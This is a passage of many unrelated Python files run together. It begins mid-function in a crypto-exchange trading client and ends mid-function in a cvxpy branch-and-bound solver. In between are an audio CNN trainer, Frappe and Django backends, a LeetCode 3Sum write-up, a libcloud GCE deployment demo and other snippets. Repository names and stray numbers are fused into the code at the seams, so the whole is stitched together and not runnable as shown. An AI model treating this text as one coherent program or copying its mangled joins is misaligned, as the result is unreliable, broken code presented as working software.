handleBody(body): # self.log.debug("{body}", body=body) data = json.loads(body) assert 'code' in data if data['code'] == 0: return data else: self.log.error('errorCode: {code}', code=data['code']) return None return httpPost(self.__url, URL, params, callback=handleBody, errback=self.ebFailed) def cancel(self, pairs, orderId=""): URL = "/tradeOpen/v2/apiCancelEntrustV2Robot" cipherText = getSign(self.__userId, orderId, self.__md5Key) params = { 'entrustId': orderId, 'cipherText': cipherText, 'userId': self.__userId } def handleBody(body): data = json.loads(body) assert 'code' in data if data['code'] == 0: return True else: self.log.debug("{data}", data=data) return False return httpPost(self.__url, URL, params, callback=handleBody, errback=self.ebFailed) def cancelAll(self, pairs, cancelType, isAll=False): """ isAll: True: cancel all pairs, False: cancel given pairs cancelType: 0: all bids and asks, 1: all bids, 2: all asks """ URL = "/tradeOpen/v1/batchCancel" cipherText = getSign(self.__userId, pairs[0], pairs[1], self.__md5Key) # self.log.debug("{cipherText}{key}", cipherText=cipherText, key=self.__md5Key) cancelType = bytes(cancelType) params = { 'coinName': pairs[0], 'payCoinName': pairs[1], 'isAll': isAll, # True: cancel all pairs, False: cancel given pairs 'type': cancelType, # 0: all bids and asks, 1: all bids, 2: all asks 'cipherText': cipherText, 'userId': self.__userId } def handleBody(body): data = json.loads(body) assert 'model' in data if data['model'] == 0: return True else: self.log.debug("{data}", data=data) return False return httpPost(self.__url, URL, params, callback=handleBody, errback=self.ebFailed) def getOrder(self, pairs, orderId=""): URL = "/tradeOpen/v2/selectEntrustById" cipherText = getSign(self.__userId, orderId, self.__md5Key) params = { 'entrustId': orderId, 'cipherText': cipherText, 'userId': self.__userId } def handleBody(body): data = json.loads(body) assert 'code' in data if data['code'] == 0: return data else: self.log.error('errorCode: {code}', code=data['code']) return None return httpPost(self.__url, URL, params, callback=handleBody, errback=self.ebFailed) def getOrders(self, pairs, tradeType, status, pageNum=1, pageSize=100): URL = "/tradeOpen/v2/apiSelectEntrustV2Robot" cipherText = getSign(self.__userId, self.__md5Key) params = { 'coinName': pairs[0], 'payCoinName': pairs[1], 'type': tradeType, 'status': status, 'pageNum': pageNum, 'pageSize': pageSize, 'cipherText': cipherText, 'userId': self.__userId } def handleBody(body): data = json.loads(body) # self.log.debug("{data}", data=data) assert 'code' in data if data['code'] == 0: return data else: self.log.error('errorCode: {code}', code=data['code']) return None return httpPost(self.__url, URL, params, callback=handleBody, errback=self.ebFailed) def getUserInfo(self): URL = "/tradeOpen/v3/getUserCapitalInfoRobot" cipherText = getSign(self.__userId, self.__md5Key) params = { 'cipherText': cipherText, 'userId': self.__userId } def handleBody(body): data = json.loads(body) assert 'code' in data if data['code'] == 0: return data else: return None return httpPost(self.__url, URL, params, callback=handleBody, errback=self.ebFailed) sisty = Sisty('http://47.75.31.125/app', MD5Key, '222', '12345678') pomadchin/raster-foundry import os from rf.models import Image from rf.utils.io import Visibility from .io import get_geotiff_size_bytes, get_geotiff_resolution from .create_bands import create_geotiff_bands def create_geotiff_image( tif_path, sourceuri, filename=None, visibility=Visibility.PRIVATE, imageMetadata={}, scene=None, owner=None, band_create_function=create_geotiff_bands, ): """Create an Image object from a GeoTIFF. Args: tif_path (str): Local path to tif file sourceuri (str): remote source of image visibility (str): accessibility level for object imageMetadata (dict): Optional dict of metadata about the image scene (Scene): Optional Scene object holding this image owner (str): Optional owner of an image band_create_function (function): function to aid in creating bands for a geotiff """ filename = filename if filename else os.path.basename(tif_path) return Image( get_geotiff_size_bytes(tif_path), visibility, filename, sourceuri, band_create_function(tif_path), imageMetadata, # TIFFs can have a different resolution in the X and Y directions, that is, pixels can be # rectangular with respect to the ground. The RF API doesn't currently support this, so just # select the X resolution. get_geotiff_resolution(tif_path)[0], [], scene=scene, owner=owner, ) """trains model, saves checkpoint files and csv files of best metrics""" from datetime import datetime import os import shutil import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from torch.utils.data import DataLoader from load_dataset import AudioDataset, TRAIN_WEIGHTS from make_predictions import make_prediction_csv from metrics import evaluate, micro_averaged_auprc TRAIN_MODE = 'all' # options: all (37 classes), coarse (8 classes), fine (29 classes) train_mode_dict = {'all': 37, 'coarse': 8, 'fine': 29} # train_mode: num_labels DATE = datetime.now().strftime('%Y%m%d_%H%M%S') RUN_NAME = DATE PREDICTION_PATH = f'csvs/{RUN_NAME}.csv' ANNOTATIONS_PATH = "dcase_files/annotations.csv" YAML_PATH = "dcase_files/dcase-ust-taxonomy.yaml" BATCH_SIZE = 32 NUM_CLASSES = train_mode_dict[TRAIN_MODE] NUM_EPOCHS = 10000 ## load model from checkpoint CHECKPOINT = True CHECKPOINT_PATH = "models/20190610_083507_coarse=0.777_fine=0.644.ckpt" ## apply weights to classes to deal with unbalanced dataset APPLY_CLASS_WEIGHTS = False WEIGHT_SMOOTHING = .1 # 1: balanced weight, < 1: reduced weight delta, > 1: increased weight delta device = torch.device("cuda" if torch.cuda.is_available() else "cpu") train_dir = "path/to/train/dataset/pickle/files.pkl" test_dir = "path/to/validate/dataset/pickle/files.pkl" TRAIN = AudioDataset(train_dir, with_embeddings=True) TEST = AudioDataset(test_dir, with_embeddings=True) TRAIN_LOADER = DataLoader(dataset=TRAIN, batch_size=BATCH_SIZE, shuffle=True) TEST_LOADER = DataLoader(dataset=TEST, batch_size=BATCH_SIZE, shuffle=True) class ConvBlock(nn.Module): """creates a convolutional layer with optional maxpool, batchnorm, and dropout""" def __init__(self, in_channels, out_channels, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), batchnorm=True, maxpool=True, maxpool_size=(2, 2), dropout=None): super(ConvBlock, self).__init__() self.conv = nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding) if maxpool: self.mp = nn.MaxPool2d(maxpool_size, stride=maxpool_size) else: self.mp = None if batchnorm: self.bn = nn.BatchNorm2d(out_channels) else: self.bn = None if dropout: self.dropout = nn.Dropout(dropout) else: self.dropout = None # self.init_weights() def forward(self, nn_input): x = nn_input if self.bn: x = F.relu(self.bn(self.conv(x))) else: x = F.relu(self.conv(x)) if self.mp: x = self.mp(x) if self.dropout: x = self.dropout(x) return x class AudioCNN(nn.Module): """Convolutions over spectrogram; merges with VGG-ish embeddings for fully-connected layers""" def __init__(self): super(AudioCNN, self).__init__() DROPOUT = .5 self.emb_size = 49152 # spectrogram convolutions self.conv_block_1 = ConvBlock(in_channels=1, out_channels=8, kernel_size=(1, 1), stride=(1, 1), padding=(0, 0), batchnorm=True, maxpool=False, maxpool_size=None, dropout=DROPOUT) self.conv_block_2 = ConvBlock(in_channels=8, out_channels=16, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), batchnorm=True, maxpool=False, maxpool_size=None, dropout=DROPOUT) self.conv_block_3 = ConvBlock(in_channels=16, out_channels=32, kernel_size=(16, 128), stride=(4, 16), padding=(8, 16), batchnorm=True, maxpool=True, maxpool_size=(4, 4), dropout=DROPOUT) self.conv_block_4 = ConvBlock(in_channels=32, out_channels=64, kernel_size=(5, 5), stride=(2, 2), padding=(1, 1), batchnorm=True, maxpool=False, maxpool_size=None, dropout=DROPOUT) self.conv_block_5 = ConvBlock(in_channels=64, out_channels=128, kernel_size=(5, 5), stride=(2, 2), padding=(1, 1), batchnorm=True, maxpool=False, maxpool_size=None, dropout=DROPOUT) self.conv_block_6 = ConvBlock(in_channels=128, out_channels=256, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), batchnorm=True, maxpool=False, maxpool_size=None, dropout=DROPOUT) ## combine output of conv_block_6 with VGG-ish embedding self.fc1 = nn.Bilinear(256, 1280, 512, bias=True) self.fc1_bn = nn.BatchNorm1d(512) self.fc2 = nn.Linear(512, 256, bias=True) self.fc2_bn = nn.BatchNorm1d(256) self.fc_final = nn.Linear(256, NUM_CLASSES, bias=True) self.fc_dropout = nn.Dropout(.2) def forward(self, nn_input): x, vgg = nn_input # (spectrogram, vggish) # spectrogram convolutions x = self.conv_block_1(x) x = self.conv_block_2(x) x = self.conv_block_3(x) x = self.conv_block_4(x) x = self.conv_block_5(x) x = self.conv_block_6(x) # flatten conv layer and vgg-ish embeddings for fc layers x = x.view(x.size(0), -1) vgg = vgg.view(vgg.size(0), -1) ## fully-connected layers x = self.fc1(x, vgg) x = self.fc1_bn(x) x = F.relu(x) x = self.fc_dropout(x) x = self.fc2(x) x = self.fc2_bn(x) x = F.relu(x) x = self.fc_dropout(x) x = self.fc_final(x) output = x return output if __name__ == '__main__': model = AudioCNN().to(device) ## if training from checkpoint, ensure checkpoint matches model class architecture if CHECKPOINT: checkpoint = torch.load(CHECKPOINT_PATH) model.load_state_dict(checkpoint) ## Loss function if WEIGHT_SMOOTHING: criterion = nn.BCEWithLogitsLoss( pos_weight=torch.tensor(np.array(TRAIN_WEIGHTS).astype(np.float32)**WEIGHT_SMOOTHING).to(device)) else: criterion = nn.BCEWithLogitsLoss() # Train the model starting_lr = .01 #.001 lr = starting_lr min_lr = 1e-6 stagnation = 0 stagnation_threshold = 10 reduce_lr_rate = .1 running_loss = 0 train_losses, test_losses = [], [] best_micro_auprc_coarse = 0 best_micro_auprc_fine = 0 # TODO: print epoch, train_loss, val_loss, micro_auprc, etc. optimizer = torch.optim.Adam(model.parameters(), lr=starting_lr) for epoch in range(NUM_EPOCHS): epoch_losses = [] if stagnation > stagnation_threshold: if lr <= min_lr: lr = starting_lr optimizer = torch.optim.Adam(model.parameters(), lr=lr) reduce_lr_rate += .1 print('.' * 50) print('reset learning rate to', lr) print('.' * 50) stagnation = 0 else: lr = lr * reduce_lr_rate optimizer = torch.optim.Adam(model.parameters(), lr=lr) print('.' * 50) print('reduced learning rate to', lr) print('.' * 50) stagnation = 0 for i, (spectrogram, label) in enumerate(TRAIN_LOADER): # Forward pass outputs = model(spectrogram) loss = criterion(outputs, label) epoch_losses.append(loss.item()) # Backward and optimize optimizer.zero_grad() loss.backward() optimizer.step() print('Epoch:', epoch) print('lr:', lr) print('Train loss:', np.mean(np.array(epoch_losses))) test_loss = 0 accuracy = 0 model.eval() ## get AUPRC scores with torch.no_grad(): make_prediction_csv(model, PREDICTION_PATH, mode=TRAIN_MODE, embed=True, test_path=test_dir) df_dict = evaluate(PREDICTION_PATH, ANNOTATIONS_PATH, YAML_PATH, 'coarse') df_dict_fine = evaluate(PREDICTION_PATH, ANNOTATIONS_PATH, YAML_PATH, 'fine') micro_auprc, eval_df = micro_averaged_auprc(df_dict, return_df=True) micro_auprc_fine, eval_df_fine = micro_averaged_auprc(df_dict_fine, return_df=True) print('Micro_AUPRC Coarse:', micro_auprc) print('Micro_AUPRC Fine:', micro_auprc_fine) if micro_auprc > best_micro_auprc_coarse or micro_auprc_fine > best_micro_auprc_fine: name, ext = os.path.splitext(PREDICTION_PATH) shutil.copy(PREDICTION_PATH, f'{name}_best_coarse={micro_auprc:.3f}_fine={micro_auprc_fine:.3f}{ext}') torch.save(model.state_dict(), f'models/{RUN_NAME}_coarse={micro_auprc:.3f}_fine={micro_auprc_fine:.3f}.ckpt') best_micro_auprc_coarse = micro_auprc best_micro_auprc_fine = micro_auprc_fine stagnation = 0 print('Best so far') else: stagnation += 1 print('Stagnation:', stagnation) print() model.train()1-10 # -*- coding: utf-8 -*- # Copyright (c) 2019, and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe from frappe.model.document import Document from datetime import datetime, timedelta class InsuranceAuthorization(Document): pass @frappe.whitelist() def get_patient_encounter(name): PE_fields = ["name", "patient", "encounter_date", "encounter_time", "practitioner", 'encounter_comment'] PE = frappe.get_value('Patient Encounter', name, PE_fields) code_fields = ['medical_code', 'code', 'description'] code = frappe.get_all('Codification Table', {'parent': PE[0]}, code_fields) return PE, code, to_datetime(PE[2],PE[3]) def to_datetime(d,t): date = d.strftime('%Y-%m-%d') time = str(t) d = date+" "+time return datetime.strptime(d, '%Y-%m-%d %H:%M:%S') ``` What if you cannot modify the input array, and you want to avoid copying it due to memory constraints? We can adapt the hashset approach above to work for an unsorted array. We can put a combination of three values into a hashset to avoid duplicates. Values in a combination should be ordered (e.g. ascending). Otherwise, we can have results with the same values in the different positions. Algorithm The algorithm is similar to the hashset approach above. We just need to add few optimizations so that it works efficiently for repeated values: Use another hashset dups to skip duplicates in the outer loop. Without this optimization, the submission will time out for the test case with 3,000 zeroes. This case is handled naturally when the array is sorted. Instead of re-populating a hashset every time in the inner loop, we can use a hashmap and populate it once. Values in the hashmap will indicate whether we have encountered that element in the current iteration. When we process nums[j] in the inner loop, we set its hashmap value to i. This indicates that we can now use nums[j] as a complement for nums[i]. This is more like a trick to compensate for container overheads. The effect varies by language, e.g. for C++ it cuts the runtime in half. Without this trick the submission may time out. ``` class Solution: def threeSum(self, nums: List[int]) -> List[List[int]]: res, dups = set(), set() seen = {} for i, val1 in enumerate(nums): if val1 not in dups: dups.add(val1) for j, val2 in enumerate(nums[i+1:]): complement = -val1 - val2 if complement in seen and seen[complement] == i: res.add(tuple(sorted((val1, val2, complement)))) seen[val2] = i return res ``` Complexity Analysis Time Complexity: \mathcal{O}(n^2)O(n 2 ). We have outer and inner loops, each going through nn elements. While the asymptotic complexity is the same, this algorithm is noticeably slower than the previous approach. Lookups in a hashset, though requiring a constant time, are expensive compared to the direct memory access. Space Complexity: \mathcal{O}(n)O(n) for the hashset/hashmap. For the purpose of complexity analysis, we ignore the memory required for the output. However, in this approach we also store output in the hashset for deduplication. In the worst case, there could be \mathcal{O}(n^2)O(n 2 ) triplets in the output, like for this example: [-k, -k + 1, ..., -1, 0, 1, ... k - 1, k]. Adding a new number to this sequence will produce n / 3 new triplets. ``` from rlagent.noises.ounoise import OUNoise 0 from .sub_ba import print_name_sublib_sub_ba import sys import os import csv import json def build_feature(row): feature = { "type": "Feature", "geometry": { "type": "Point", "coordinates": [row['Longitude'], row['Latitude']] }, "properties": {k: v for k, v in row.items() if k not in ['stop_lon', 'stop_lat']} } return feature if __name__ == "__main__": if len(sys.argv) == 1: print "usage: csv-to-geojson " sys.exit(1) gtfs_file = sys.argv[1] outfile = None if len(sys.argv) == 3: outfile = sys.argv[2] # skeleton json object geojson_out = { "type": "FeatureCollection", "features": [] }; if not os.path.exists(gtfs_file): print "usage: csv-to-geojson " sys.exit(1) # read in the gtfs/csv with open(gtfs_file, "r") as gtfs: for row in csv.DictReader(gtfs): geojson_out['features'].append(build_feature(row)) # write the json file try: if not outfile: outfile = gtfs_file.split('.') outfile = outfile[0] + '.json' json_data = json.dumps(geojson_out, indent=2) fd = open(outfile, 'w') fd.write(json_data) fd.close() except Exception, e: raise from polecat import model def build_test_model(field_hook=None): class TestModel(model.Model): field = model.IntField(hooks=field_hook) return TestModel def test_field_hook(push_blueprint): called = 0 def test_field_hook(blueprint): nonlocal called called += 1 build_test_model(field_hook=test_field_hook) push_blueprint.run_hooks() assert called == 1 # If not stated otherwise in this file or this component's license file the # following copyright and licenses apply: # # Copyright 2020 Consult Red # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import json import click from loguru import logger class STBPlatform: def __init__(self, name, search_path=None): self.name = name # Default to looking in the source code templates directory if not search_path: self.search_path = os.path.abspath(os.path.join( os.path.dirname(__file__), os.pardir, os.pardir, 'templates')) else: self.search_path = search_path # Find config files for the platform self.search_config() # Parse the configs we just found if self.found_config(): self.parse_config() # ========================================================================== def search_config(self): """Search for a config file for the specified platform Config files should live in the templates directory or a custom directory """ # Loop through all the dirs, looking for a .json and # _libs.json file config_files = [] for subdir, dirs, files in os.walk(self.search_path): for file in files: if self.name in file: # Found a suitable config file config_path = os.path.join(subdir, file) config_files.append(config_path) logger.debug(f"Found platform config {config_path}") self.config_files = config_files # ========================================================================== def parse_config(self): """Parse the platform config files into a python dictionary """ dictionary_list = [] # Load all the config files for file in self.config_files: with open(file) as jsonFile: data = json.load(jsonFile) dictionary_list.append(data) # Merge all the config files into one dictionary self.config = {} for dict in dictionary_list: self.config.update(dict) # ========================================================================== def found_config(self): """Returns true if at least one config file was found for the platform Returns: bool: True if at least one config found """ return len(self.config_files) > 0 def get_config(self): """Returns the config dictionary for the platform Returns: dictionary: the config dictionary for the platform """ return self.config class MetricLogger: r"""Keeps track of training and validation curves, by recording: - Last value of train and validation metrics. - Train and validation metrics corresponding to maximum or minimum validation metric value. - Exponential moving average of train and validation metrics. Args: smoothing_factor (float, Optional): Smoothing factor used in exponential moving average. (default: :obj:`0.4`). max (bool, Optional): If :obj:`True`, tracks max value. Otherwise, tracks min value. (default: :obj:`True`). """ def __init__(self, smoothing_factor=0.4, max=True): self.smoothing_factor = smoothing_factor self.max = max # init variables # last self.train_last = None self.val_last = None self.test_last = None # moving average self.train_smooth = None self.val_smooth = None self.test_smooth = None # max self.train_minmax = None self.val_minmax = None self.test_minmax = None self.step_minmax = None def __repr__(self): out = "Last: (Train) %.4f (Val) %.4f\n" % (self.train_last, self.val_last) out += "Smooth: (Train) %.4f (Val) %.4f\n" % (self.train_smooth, self.val_smooth) out += "Max: (Train) %.4f (Val) %.4f\n" % (self.train_minmax, self.val_minmax) return out def update(self, train_value, val_value, test_value=0., step=None): # last values self.train_last = train_value self.val_last = val_value self.test_last = test_value # exponential moving average self.train_smooth = self.smoothing_factor * train_value + (1 - self.smoothing_factor) * self.train_smooth \ if self.train_smooth is not None else train_value self.val_smooth = self.smoothing_factor * val_value + (1 - self.smoothing_factor) * self.val_smooth \ if self.val_smooth is not None else val_value self.test_smooth = self.smoothing_factor * test_value + (1 - self.smoothing_factor) * self.test_smooth \ if self.test_smooth is not None else test_value # max/min validation accuracy if self.val_minmax is None or (self.max and self.val_minmax < val_value) or \ (not self.max and self.val_minmax > val_value): self.train_minmax = train_value self.val_minmax = val_value self.test_minmax = test_value if step: self.step_minmax = step def __getattr__(self, item): if item not in ['train_min', 'train_max', 'val_min', 'val_max', 'test_min', 'test_max']: raise AttributeError if self.max and item in ['train_min', 'val_min', 'test_min']: raise AttributeError('Tracking maximum values, not minimum.') if not self.max and item in ['train_max', 'val_max', 'test_max']: raise AttributeError('Tracking minimum values, not maximum.') if 'train' in item: return self.train_minmax elif 'val' in item: return self.val_minmax elif 'test' in item: return self.test_minmax andreacarriero/infrastructure-cc1-10 import logging from flask import Blueprint, abort from flask_restful import Api, Resource, reqparse from toolbox.logger import get_logger from modules.project.models import Project, ResourceNodeLink, ProjectCommandJob from modules.user.models import User from modules.node.models import Node, NodeCommand log = get_logger(__name__) app = Blueprint(__name__, __name__) api = Api(app) class RootResource(Resource): """ Manages Projects """ def get(self): log.info("Getting all projects") projects = Project.query.all() return [project.serialize() for project in projects] class ProjectResource(Resource): """ Manages specific project """ def get(self, project_id): log.info("Getting project ID:%d", project_id) project = Project.query.filter_by(id=project_id).first() if not project: abort(404) user = User.query.filter_by(id=project.user_id).first() nodes_links = ResourceNodeLink.query.filter_by(project_id=project_id).all() project_command_jobs = ProjectCommandJob.query.filter_by(project_id=project_id).all() return { 'project': project.serialize(), 'user': user.serialize(), 'nodes': [link.serialize_node() for link in nodes_links], 'project_command_jobs': [job.serialize() for job in project_command_jobs] } class ProjectCommandJobResource(Resource): """ Manages specific command job """ def get(self, project_id, job_id): log.info("Getting job ID:%d", job_id) job = ProjectCommandJob.query.filter_by(id=job_id).first() if not job: abort(404, "Project Command Job not found") node_commands = NodeCommand.query.filter_by(project_command_job_id=job_id).all() return { 'project_command_job': job.serialize(), 'node_commands': [command.serialize() for command in node_commands] } api.add_resource(RootResource, '/', endpoint='projects') api.add_resource(ProjectResource, '/', endpoint='project') api.add_resource(ProjectCommandJobResource, '//jobs/', endpoint='project_command_job') 1-10 # customformatter.py # Defines a logging formatter to customize the logger's output: # - sets the format: "time - logger - level - log (file:line)" # - adds colour to the levels import logging class CustomFormatter(logging.Formatter): """ Custom logging formatter to colour-code the levels. """ # Colours for formatting console text BLUE = '\033[94m' CYAN = '\033[96m' YELLOW = '\033[93m' RED = '\033[91m' BOLDRED = '\033[31;20m' ENDC = '\033[0m' # The extra spaces are intended, just in case. format_prefix = "%(asctime)s - " format_level = "%(levelname)s" format_body = " - %(message)s (%(module)s:%(funcName)s:%(lineno)d)" FORMATS = { logging.DEBUG: format_prefix + BLUE + format_level + ENDC + format_body, logging.INFO: format_prefix + CYAN + format_level + ENDC + format_body, logging.WARNING: format_prefix + YELLOW + format_level + ENDC + format_body, logging.ERROR: format_prefix + RED + format_level + ENDC + format_body, logging.CRITICAL: format_prefix + BOLDRED + format_level + ENDC + format_body, } def format(self, record: logging.LogRecord): log_fmt = self.FORMATS.get(record.levelno) formatter = logging.Formatter(log_fmt) return formatter.format(record) TommyWongww/killingCodes # @Time : 2019/4/25 23:48 # @Author : shakespere # @FileName: Merge Two Binary Trees.py ''' 617. Merge Two Binary Trees Easy Given two binary trees and imagine that when you put one of them to cover the other, some nodes of the two trees are overlapped while the others are not. You need to merge them into a new binary tree. The merge rule is that if two nodes overlap, then sum node values up as the new value of the merged node. Otherwise, the NOT null node will be used as the node of new tree. Example 1: Input: Tree 1 Tree 2 1 2 / \ / \ 3 2 1 3 / \ \ 5 4 7 Output: Merged tree: 3 / \ 4 5 / \ \ 5 4 7 Note: The merging process must start from the root nodes of both trees. ''' # Definition for a binary tree node. # class TreeNode(object): # def __init__(self, x): # self.val = x # self.left = None # self.right = None class Solution(object): def mergeTrees(self, t1, t2): """ :type t1: TreeNode :type t2: TreeNode :rtype: TreeNode """ if not t1: return t2 if not t2: return t1 t1.val+=t2.val t1.left = self.mergeTrees(t1.left,t2.left) t1.right = self.mergeTrees(t1.right,t2.right) return t10 from django.contrib.auth.models import update_last_login from django.contrib.auth.signals import user_logged_in from ngw.core.models import Contact # Ugly work around for NOT using update_last_login that is hardcoded in # crontrib.auth : user_logged_in.disconnect(update_last_login) class NgwAuthBackend(object): """ Authenticate a user """ # required by contrib.auth: supports_inactive_user = False def authenticate(self, request, username=None, password=None): if not username or not password: return None try: contact = Contact.objects.get_by_natural_key(username) except (Contact.DoesNotExist, Contact.MultipleObjectsReturned): return None if contact.check_password(password): contact.update_lastconnection() return contact return None # authentification failed def get_user(self, user_id): try: return Contact.objects.get(pk=user_id) except Contact.DoesNotExist: return None girardinsamuel/health """Masonite Health Settings""" """ |-------------------------------------------------------------------------- | A Heading of The Setting Being Set |-------------------------------------------------------------------------- | | A quick description | """ SETTING = "some value" from typing import Any, Dict class PipelineToken: value: str hashval: str model: str server: str method: str params: Dict[str, str] queries: Dict[str, Any] def __init__(self, model: str, server: str, method: str, params: Dict[str, str], queries: Dict[str, Any]): self.model = model self.server = server self.method = method self.params = params self.queries = queries if self.server: self.parent = f"{self.model}/{self.server}/{self.method}" else: self.parent = f"{self.model}/{self.method}" self.value = f"{self.parent}{self.parse_params(self.params)}{self.parse_queries(self.queries)}" self.hashval = hash((self.model, self.server, self.method, str(self.params), str(self.queries))) def __hash__(self): return self.hashval @staticmethod def parse_params(dic: Dict) -> str: res = "/".join(str(v) for v in dic.values()) return "/" + res if res else "" @staticmethod def parse_queries(dic: Dict) -> str: res = "&".join(f"{k}={v}" for k, v in dic.items()) return "?" + res if res else "" def dict(self) -> dict: return { "model": self.model, "server": self.server, "method": self.method, "params": self.params, "queries": self.queries, } @classmethod def load(cls, dic) -> 'PipelineToken': return cls(dic["model"], dic["server"], dic["method"], dic["params"], dic["queries"]) sunny-khatik/060_SunnyKhatik #from google.colab import drive #drive.mount("/content/drive") # Step 1: Import Libraries import numpy as np import pandas as pd from sklearn.impute import SimpleImputer # Step 2: Load Data datasets = pd.read_csv('Data_for_Missing_Values.csv') print("\nData :\n",datasets) print("\nData statistics\n",datasets.describe()) # Step 4: Find the missing values and handle it in either way # 4a. Removing the row with all null values datasets.dropna(how='all',inplace=True) print("\nNew Data :",datasets) # 4b. Imputation (Replacing null values with mean value of that attribute) # All rows, all columns except last new_X = datasets.iloc[:, :-1].values # Only last column new_Y = datasets.iloc[:, -1].values # Using Imputer function to replace NaN values with mean of that parameter value imputer = SimpleImputer(missing_values = np.nan,strategy = "mean") # Fitting the data, function learns the stats imputer = imputer.fit(new_X[:, 1:3]) # fit_transform() will execute those stats on the input ie. X[:, 1:3] new_X[:, 1:3] = imputer.transform(new_X[:, 1:3]) # filling the missing value with mean print("\n\nNew Input with Mean Value for NaN : \n\n", new_X) import json from pprint import pprint import matplotlib.pyplot as plt with open('flows.json') as data_file: data = json.load(data_file) pprint(data) for i in data: # Check if greater than 2 or insert a bigger more reasonable value if(len(i['values']['delta_bps_records'])>=2): plt.plot(i['values']['delta_bps_records']) plt.ylabel('delta_bps') # plt.xlabel( ) plt.title('sourceIPv4Address: ' + str(i['values']['sourceIPv4Address']) +' -> '+ 'sourceTransportPort: ' + str(i['values']['sourceTransportPort']) +'\n'+ 'destinationIPv4Address: ' + str(i['values']['destinationIPv4Address']) +' -> '+ 'destinationTransportPort: ' + str(i['values']['destinationTransportPort']) ) plt.show()0 from __future__ import with_statement import os from libcloud.compute.types import Provider from libcloud.compute.providers import get_driver from libcloud.compute.deployment import ScriptDeployment # Path to the private SSH key file used to authenticate PRIVATE_SSH_KEY_PATH = os.path.expanduser("~/.ssh/id_rsa_gce") # Path to the public SSH key file which will be installed on the server for # the root user PUBLIC_SSH_KEY_PATH = os.path.expanduser("~/.ssh/id_rsa_gce.pub") with open(PUBLIC_SSH_KEY_PATH, "r") as fp: PUBLIC_SSH_KEY_CONTENT = fp.read().strip() # GCE authentication related info SERVICE_ACCOUNT_USERNAME = "@.iam.gserviceaccount.com" SERVICE_ACCOUNT_CREDENTIALS_JSON_FILE_PATH = "/path/to/sac.json" PROJECT_ID = "my-gcp-project" Driver = get_driver(Provider.GCE) driver = Driver( SERVICE_ACCOUNT_USERNAME, SERVICE_ACCOUNT_CREDENTIALS_JSON_FILE_PATH, project=PROJECT_ID, datacenter="us-central1-a", ) step = ScriptDeployment("echo whoami ; date ; ls -la") images = driver.list_images() sizes = driver.list_sizes() image = [i for i in images if i.name == "ubuntu-1604-xenial-v20191217"][0] size = [s for s in sizes if s.name == "e2-micro"][0] print("Using image: %s" % (image)) print("Using size: %s" % (size)) # NOTE: We specify which public key is installed on the instance using # metadata functionality. # Keep in mind that this step is only needed if you want to install a specific # key which is used to run the deployment script. # If you are using a VM image with a public SSH key already pre-baked in or if # you use project wide ssh-keys GCP functionality, you can remove ex_metadata # argument, but you still need to make sure the private key you use inside this # script matches the one which is installed / available on the server. ex_metadata = metadata = { "items": [{"key": "ssh-keys", "value": "root: %s" % (PUBLIC_SSH_KEY_CONTENT)}] } # deploy_node takes the same base keyword arguments as create_node. node = driver.deploy_node( name="libcloud-deploy-demo-1", image=image, size=size, ex_metadata=metadata, deploy=step, ssh_key=PRIVATE_SSH_KEY_PATH, ) print("") print("Node: %s" % (node)) print("") print("stdout: %s" % (step.stdout)) print("stderr: %s" % (step.stderr)) print("exit_code: %s" % (step.exit_status)) 1-10 # -*- coding: utf-8 -*- # Generated by Django 1.11.3 on 2017-07-29 15:09 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [("accounts", "0005_user_is_staff")] operations = [ migrations.RunSQL( "CREATE UNIQUE INDEX accounts_user_unique_username ON accounts_user (UPPER(username))", "DROP INDEX IF EXISTS accounts_user_unique_username", ) ] """ @brief test log(time=6s) """ import sys import os import unittest from pyquickhelper.ipythonhelper import retrieve_notebooks_in_folder from pyquickhelper.pycode import ExtTestCase class TestNotebookAutomation(ExtTestCase): def test_notebook_retrieve(self): this = os.path.abspath(os.path.dirname(__file__)) nbfile = os.path.join(this, "..", "..", "_doc", "notebooks") self.assertExists(nbfile) res = retrieve_notebooks_in_folder(nbfile) self.assertNotEmpty(res) if __name__ == "__main__": unittest.main() import sys input = sys.stdin.readline def countFacPrime(n, t): step = t result = 0 while n >= step: result += n // step step *= t return result n, m = map(int, input().split()) facN2 = countFacPrime(n, 2) facN5 = countFacPrime(n, 5) facM2 = countFacPrime(m, 2) facM5 = countFacPrime(m, 5) facNM2 = countFacPrime(n-m, 2) facNM5 = countFacPrime(n-m, 5) result = min(facN2-facM2-facNM2, facN5-facM5-facNM5) print(result) """ Copyright 2013 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import cvxopt import cvxpy.problems.problem as problem import cvxpy.settings as s from boolean import Boolean def branch(booleans): bool_vals = (b for b in booleans if not b.fix_values) # pick *a* boolean variable to branch on # choose the most ambivalent one (smallest distance to 0.5) # NOTE: if there are no boolean variables, will never branch return min(bool_vals, key=lambda x: abs(x.value - 0.5)) def bound(prob, booleans): # relax boolean constraints for bool_var in booleans: bool_var.relax() # solves relaxation lower_bound = prob._solve() if isinstance(lower_bound, str): lower_bound = float('inf') # round boolean variables and re-solve to obtain upper bound for bool_var in booleans: bool_var.round() upper_bound = prob._solve() if isinstance(upper_bound, str): upper_bound = float('inf') return {'gap': upper_bound - lower_bound, 'ub': upper_bound, 'lb': lower_bound, 'obj': upper_bound, 'sol': map(lambda x: x.value, booleans)} def solve_wrapper(prob, i, booleans, depth, epsilon): if i > depth: return None # branch branch_var = branch(booleans) # try true branch branch_var.set(True) true_branch = bound(prob, booleans) # try false branch branch_var.set(False) false_branch = bound(prob, booleans) # keep track of best objective so far if true_branch['obj'] < false_branch['obj']: solution = true_branch else: solution = false_branch # update the bound 